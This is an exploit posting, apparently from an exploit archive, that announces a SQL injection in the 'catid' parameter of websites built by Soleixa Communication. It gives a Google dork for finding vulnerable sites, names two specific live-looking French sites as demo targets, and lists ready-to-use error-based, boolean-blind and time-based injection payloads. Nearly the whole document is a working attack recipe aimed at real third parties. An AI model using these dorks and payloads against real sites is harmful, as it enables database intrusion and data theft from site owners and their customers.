#################################################################################
# Exploit Title: Soleixa Communication Sql İnjection Vulnerability
# Author : TrazeR & AKINCİLAR
# Google Dork : intext:"Webdesign : Soleixa Communication." inurl:catid=
# Tested on : Kali Linux 2018.1
# Date : 08.05.2018
# Vendor Home: http://www.soleixa-communication.com/
# Blog : https://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] GET parameter 'catid' is vulnerable
Demo: http://www.acstremy.fr/contenu/index.php?catid=
Parameter: catid (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: catid=(SELECT 4284 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT
(ELT(4284=4284,1))),0x7176626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Demo 2 : http://www.animalerie-chiots-chatons-aquatiti.com/animalerie/index.php?catid=27
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=27 AND 3838=3838
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: catid=27 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178767a71,(SELECT (ELT(8814=8814,1))),0x71706a7671,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: catid=27 AND SLEEP(5)
#AKINCILAR ! BU GECE SAYGI DUYUN !
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]